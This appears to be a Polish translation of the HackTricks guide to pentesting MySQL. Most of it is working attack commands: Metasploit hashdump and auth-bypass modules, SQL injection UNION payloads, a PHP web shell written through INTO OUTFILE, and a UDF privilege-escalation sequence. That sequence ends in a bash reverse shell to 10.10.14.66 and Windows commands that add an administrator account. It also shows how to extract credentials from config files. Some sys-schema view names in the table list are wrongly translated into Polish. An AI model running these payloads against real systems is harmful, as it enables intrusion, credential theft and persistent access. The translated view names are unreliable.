3306 - Pentesting Mysql

Nauka hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

RootedCON to najważniejsze wydarzenie z zakresu cyberbezpieczeństwa w Hiszpanii i jedno z najważniejszych w Europie. Mając misję promowania wiedzy technicznej, ten kongres stanowi gorący punkt spotkań dla profesjonalistów technologii i cyberbezpieczeństwa we wszystkich dziedzinach.

Podstawowe informacje

MySQL można opisać jako otwarty system Zarządzania Bazą Danych Relacyjnych (RDBMS) dostępny bezpłatnie. Działa on w oparciu o Structured Query Language (SQL), umożliwiając zarządzanie i manipulację bazami danych.

Domyślny port: 3306

3306/tcp open  mysql

Połącz

Lokalnie

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Zdalny

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Zewnętrzne wyliczanie

Niektóre z działań wyliczania wymagają poprawnych poświadczeń.

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Napisz dowolne dane binarne

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Komendy MySQL

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Wyliczanie Uprawnień MySQL

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Możesz zobaczyć w dokumentacji znaczenie każdego uprawnienia: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

pageMySQL File priv to SSRF/RCE

MySQL arbitralne odczytywanie plików przez klienta

Faktycznie, gdy próbujesz załadować dane lokalnie do tabeli, zawartość pliku, serwer MySQL lub MariaDB prosi klienta o odczytanie go i przesłanie zawartości. Jeśli więc możesz przerobić klienta mysql, aby połączył się z twoim własnym serwerem MySQL, możesz odczytywać dowolne pliki. Proszę zauważyć, że jest to zachowanie używane:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Pamiętaj o słowie "local") Ponieważ bez "local" możesz otrzymać:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Początkowy PoC: https://github.com/allyshka/Rogue-MySql-Server W tej publikacji znajdziesz kompletny opis ataku oraz jak go rozbudować do RCE: https://paper.seebug.org/1113/ Tutaj znajdziesz przegląd ataku: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​​RootedCON to najważniejsze wydarzenie z zakresu cyberbezpieczeństwa w Hiszpanii i jedno z najważniejszych w Europie. Mając misję promowania wiedzy technicznej, ten kongres jest gorącym punktem spotkań dla profesjonalistów technologii i cyberbezpieczeństwa we wszystkich dziedzinach.

POST

Użytkownik Mysql

Będzie bardzo interesujące, jeśli mysql działa jako root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Niebezpieczne ustawienia mysqld.cnf

W konfiguracji usług MySQL stosuje się różne ustawienia w celu zdefiniowania jej działania i środków bezpieczeństwa:

  • Ustawienie user jest wykorzystywane do określenia użytkownika, pod którym będzie wykonywana usługa MySQL.

  • password jest stosowane do ustanowienia hasła powiązanego z użytkownikiem MySQL.

  • admin_address określa adres IP, na którym nasłuchuje połączeń TCP/IP na interfejsie sieci administracyjnej.

  • Zmienna debug wskazuje na obecne konfiguracje debugowania, w tym wrażliwe informacje w dziennikach.

  • sql_warnings zarządza generowaniem ciągów informacyjnych dla instrukcji INSERT jednego wiersza, gdy pojawiają się ostrzeżenia, zawierające wrażliwe dane w dziennikach.

  • Dzięki secure_file_priv zakres operacji importu i eksportu danych jest ograniczony w celu zwiększenia bezpieczeństwa.

Eskalacja uprawnień

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Eskalacja uprawnień za pomocą biblioteki

Jeśli serwer mysql działa jako root (lub inny bardziej uprzywilejowany użytkownik), możesz sprawić, że będzie on wykonywał polecenia. W tym celu musisz użyć zdefiniowanych przez użytkownika funkcji. Aby utworzyć zdefiniowaną przez użytkownika funkcję, będziesz potrzebował biblioteki dla systemu operacyjnego, na którym działa mysql.

Złośliwą bibliotekę do użycia można znaleźć wewnątrz sqlmap oraz wewnątrz metasploita, wykonując polecenie locate "*lib_mysqludf_sys*". Pliki .so to biblioteki linuxowe, a pliki .dll to te dla systemu Windows, wybierz odpowiedni dla Ciebie.

Jeśli nie masz tych bibliotek, możesz albo poszukać ich, albo pobrać ten kod C dla systemu Linux i skompilować go wewnątrz podatnej na atak maszyny z systemem Linux:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Teraz, gdy masz bibliotekę, zaloguj się do Mysql jako uprzywilejowany użytkownik (root?) i postępuj zgodnie z następującymi krokami:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Wyodrębnianie danych logowania MySQL z plików

Wewnątrz /etc/mysql/debian.cnf można znaleźć hasło w postaci zwykłego tekstu użytkownika debian-sys-maint

cat /etc/mysql/debian.cnf

Możesz użyć tych poświadczeń, aby zalogować się do bazy danych mysql.

Wewnątrz pliku: /var/lib/mysql/mysql/user.MYD znajdziesz wszystkie hashe użytkowników MySQL (te, które można wydobyć z mysql.user wewnątrz bazy danych).

Możesz je wydobyć wykonując:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Włączanie logowania

Możesz włączyć logowanie zapytań mysql wewnątrz /etc/mysql/my.cnf odkomentowując następujące linie:

Przydatne pliki

Pliki konfiguracyjne

  • windows *

  • config.ini

  • my.ini

  • windows\my.ini

  • winnt\my.ini

  • <InstDir>/mysql/data/

  • unix

  • my.cnf

  • /etc/my.cnf

  • /etc/mysql/my.cnf

  • /var/lib/mysql/my.cnf

  • ~/.my.cnf

  • /etc/my.cnf

  • Historia poleceń

  • ~/.mysql.history

  • Pliki dziennika

  • connections.log

  • update.log

  • common.log

Domyślne bazy danych/tabele MySQL

ALL_PLUGINS APPLICABLE_ROLES CHARACTER_SETS CHECK_CONSTRAINTS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENABLED_ROLES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE KEY_CACHES OPTIMIZER_TRACE PARAMETERS PARTITIONS PLUGINS PROCESSLIST PROFILING REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS SYSTEM_VARIABLES TABLES TABLESPACES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS INNODB_LOCKS INNODB_TRX INNODB_SYS_DATAFILES INNODB_FT_CONFIG INNODB_SYS_VIRTUAL INNODB_CMP INNODB_FT_BEING_DELETED INNODB_CMP_RESET INNODB_CMP_PER_INDEX INNODB_CMPMEM_RESET INNODB_FT_DELETED INNODB_BUFFER_PAGE_LRU INNODB_LOCK_WAITS INNODB_TEMP_TABLE_INFO INNODB_SYS_INDEXES INNODB_SYS_TABLES INNODB_SYS_FIELDS INNODB_CMP_PER_INDEX_RESET INNODB_BUFFER_PAGE INNODB_FT_DEFAULT_STOPWORD INNODB_FT_INDEX_TABLE INNODB_FT_INDEX_CACHE INNODB_SYS_TABLESPACES INNODB_METRICS INNODB_SYS_FOREIGN_COLS INNODB_CMPMEM INNODB_BUFFER_POOL_STATS INNODB_SYS_COLUMNS INNODB_SYS_FOREIGN INNODB_SYS_TABLESTATS GEOMETRY_COLUMNS SPATIAL_REF_SYS CLIENT_STATISTICS INDEX_STATISTICS USER_STATISTICS INNODB_MUTEXES TABLE_STATISTICS INNODB_TABLESPACES_ENCRYPTION user_variables INNODB_TABLESPACES_SCRUBBING INNODB_SYS_SEMAPHORE_WAITS

columns_priv column_stats db engine_cost event func general_log gtid_executed gtid_slave_pos help_category help_keyword help_relation help_topic host index_stats innodb_index_stats innodb_table_stats ndb_binlog_index plugin proc procs_priv proxies_priv roles_mapping server_cost servers slave_master_info slave_relay_log_info slave_worker_info slow_log tables_priv table_stats time_zone time_zone_leap_second time_zone_name time_zone_transition time_zone_transition_type transaction_registry user

accounts cond_instances events_stages_current events_stages_history events_stages_history_long events_stages_summary_by_account_by_event_name events_stages_summary_by_host_by_event_name events_stages_summary_by_thread_by_event_name events_stages_summary_by_user_by_event_name events_stages_summary_global_by_event_name events_statements_current events_statements_history events_statements_history_long events_statements_summary_by_account_by_event_name events_statements_summary_by_digest events_statements_summary_by_host_by_event_name events_statements_summary_by_program events_statements_summary_by_thread_by_event_name events_statements_summary_by_user_by_event_name events_statements_summary_global_by_event_name events_transactions_current events_transactions_history events_transactions_history_long events_transactions_summary_by_account_by_event_name events_transactions_summary_by_host_by_event_name events_transactions_summary_by_thread_by_event_name events_transactions_summary_by_user_by_event_name events_transactions_summary_global_by_event_name events_waits_current events_waits_history events_waits_history_long events_waits_summary_by_account_by_event_name events_waits_summary_by_host_by_event_name events_waits_summary_by_instance events_waits_summary_by_thread_by_event_name events_waits_summary_by_user_by_event_name events_waits_summary_global_by_event_name file_instances file_summary_by_event_name file_summary_by_instance global_status global_variables host_cache hosts memory_summary_by_account_by_event_name memory_summary_by_host_by_event_name memory_summary_by_thread_by_event_name memory_summary_by_user_by_event_name memory_summary_global_by_event_name metadata_locks mutex_instances objects_summary_global_by_type performance_timers prepared_statements_instances replication_applier_configuration replication_applier_status replication_applier_status_by_coordinator replication_applier_status_by_worker replication_connection_configuration replication_connection_status replication_group_member_stats replication_group_members rwlock_instances session_account_connect_attrs session_connect_attrs session_status session_variables setup_actors setup_consumers setup_instruments setup_objects setup_timers socket_instances socket_summary_by_event_name socket_summary_by_instance status_by_account status_by_host status_by_thread status_by_user table_handles table_io_waits_summary_by_index_usage table_io_waits_summary_by_table table_lock_waits_summary_by_table threads user_variables_by_thread users variables_by_thread

host_summary host_summary_by_file_io host_summary_by_file_io_type host_summary_by_stages host_summary_by_statement_latency host_summary_by_statement_type innodb_buffer_stats_by_schema innodb_buffer_stats_by_table innodb_lock_waits io_by_thread_by_latency io_global_by_file_by_bytes io_global_by_file_by_latency io_global_by_wait_by_bytes io_global_by_wait_by_latency latest_file_io memory_by_host_by_current_bytes memory_by_thread_by_current_bytes memory_by_user_by_current_bytes memory_global_by_current_bytes memory_global_total metrics processlist ps_check_lost_instrumentation schema_auto_increment_columns schema_index_statistics schema_object_overview schema_redundant_indexes schema_table_lock_waits\

schema_table_statistics\
schema_table_statistics_with_buffer\
schema_tables_with_full_table_scans\
schema_unused_indexes\
sesja\
sesja_ssl_status\
analiza_zapytan\
zapytania_z_bledami_lub_ostrzezeniami\
zapytania_z_pelna_tabela_skanow\
zapytania_z_czasami_w_95_percentylu\
zapytania_z_sortowaniem\
zapytania_z_tabelami_tymczasowymi\
sys_config\
podsumowanie_uzytkownika\
podsumowanie_uzytkownika_wedlug_io_pliku\
podsumowanie_uzytkownika_wedlug_typu_io_pliku\
podsumowanie_uzytkownika_wedlug_etapow\
podsumowanie_uzytkownika_wedlug_opoznienia_zapytania\
podsumowanie_uzytkownika_wedlug_typu_zapytania\
wersja\
klasy_oczekiwania_globalne_wedlug_sredniego_opoznienia\
klasy_oczekiwania_globalne_wedlug_opoznienia\
oczekiwanie_globalne_wedlug_opoznienia_hosta\
oczekiwanie_globalne_wedlug_opoznienia_uzytkownika\
oczekiwanie_globalne_wedlug_opoznienia\
x$podsumowanie_hosta\
x$podsumowanie_hosta_wedlug_io_pliku\
x$podsumowanie_hosta_wedlug_typu_io_pliku\
x$podsumowanie_hosta_wedlug_etapow\
x$podsumowanie_hosta_wedlug_opoznienia_zapytania\
x$podsumowanie_hosta_wedlug_typu_zapytania\
x$statystyki_bufora_innodb_wedlug_schematu\
x$statystyki_bufora_innodb_wedlug_tabeli\
x$oczekiwanie_na_blokade_innodb\
x$io_watek_wedlug_opoznienia\
x$io_globalne_plik_wedlug_bajtow\
x$io_globalne_plik_wedlug_opoznienia\
x$io_globalne_oczekiwanie_wedlug_bajtow\
x$io_globalne_oczekiwanie_wedlug_opoznienia\
x$najnowsze_io_pliku\
x$pamiec_hosta_wedlug_biezacych_bajtow\
x$pamiec_watek_wedlug_biezacych_bajtow\
x$pamiec_uzytkownika_wedlug_biezacych_bajtow\
x$pamiec_globalna_wedlug_biezacych_bajtow\
x$pamiec_globalna_ogolem\
x$lista_procesow\
x$ps_digest_95_percentyl_wedlug_sredniego_us\
x$ps_digest_rozklad_sredniego_opoznienia\
x$ps_statystyki_io_schematu_tabeli\
x$schemat_zaplanowanych_kluczy\
x$statystyki_indeksow_schematu\
x$blokady_tabeli_schematu\
x$statystyki_tabeli_schematu\
x$statystyki_tabeli_schematu_z_buforem\
x$tabele_z_pelna_tabela_skanow\
x$sesja\
x$analiza_zapytan\
x$zapytania_z_bledami_lub_ostrzezeniami\
x$zapytania_z_pelna_tabela_skanow\
x$zapytania_z_czasami_w_95_percentylu\
x$zapytania_z_sortowaniem\
x$zapytania_z_tabelami_tymczasowymi\
x$podsumowanie_uzytkownika\
x$podsumowanie_uzytkownika_wedlug_io_pliku\
x$podsumowanie_uzytkownika_wedlug_typu_io_pliku\
x$podsumowanie_uzytkownika_wedlug_etapow\
x$podsumowanie_uzytkownika_wedlug_opoznienia_zapytania\
x$podsumowanie_uzytkownika_wedlug_typu_zapytania\
x$klasy_oczekiwania_globalne_wedlug_sredniego_opoznienia\
x$klasy_oczekiwania_globalne_wedlug_opoznienia\
x$oczekiwanie_globalne_wedlug_opoznienia_hosta\
x$oczekiwanie_globalne_wedlug_opoznienia_uzytkownika\
x$oczekiwanie_globalne_wedlug_opoznienia
Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.xyz/pentesting/pentesting-mysql

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

RootedCON to najbardziej istotne wydarzenie z zakresu cyberbezpieczeństwa w Hiszpanii i jedno z najważniejszych w Europie. Mając misję promowania wiedzy technicznej, ten kongres stanowi wrzące miejsce spotkań dla profesjonalistów technologii i cyberbezpieczeństwa we wszystkich dziedzinach.

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated